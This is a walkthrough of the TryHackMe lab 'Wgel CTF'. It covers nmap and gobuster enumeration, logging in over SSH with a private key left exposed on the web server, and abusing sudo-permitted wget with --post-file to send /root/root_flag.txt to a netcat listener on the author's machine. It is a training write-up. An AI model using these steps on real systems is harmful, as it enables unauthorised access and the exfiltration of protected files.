Wgel CTF TryHackMe Walkthrough

A writeup for TryHackMe room: Wgel CTF

wgel

Wgel CTF

My target IP is 10.10.165.128, you should change it to yours to execute commands.

Nmap

nmap 10.10.165.128

namp results

Gobuster

gobuster dir -u 10.10.165.128 -w gobusterDir.txt

gobuster results

Lets search for 10.10.165.128/sitemap aswell.

gobuster results

Looks like we’ve found a RSA key.

Website Inspection

There is an Apache default page at the IP address. However, I saw this while viewing source code:

page source

Seems like username for SSH is Jessie.

10.10.165.128/.ssh

id_rsa

SSH

Well, key is not encrypted so we can connect directly. I will save the key to a file named rsaid and give it 600 permissions.

chmod 600 rsaid

Now we can connect using the key.

ssh -i 'rsaid' jessie@10.10.165.128

User Flag

I will search around a bit.

user flag

Root Flag

First, lets see if we can use some commands.

sudo -l

It allows us to use wget command so lets see what we can find about it at gtfobins.

GTFOBins

We can upload root flag to our local machine.

I will start listening any port i want with netcat. 4444 is the port i chose.

nc -lvnp 4444

Now we can use the command we saw at gtfobins.

sudo wget --post-file=/root/root_flag.txt 10.9.2.92:4444

Note that 10.9.2.92 is my IP. Therefore, you should change it to yours.

sending root flag

root flag

Netcat captured the flag.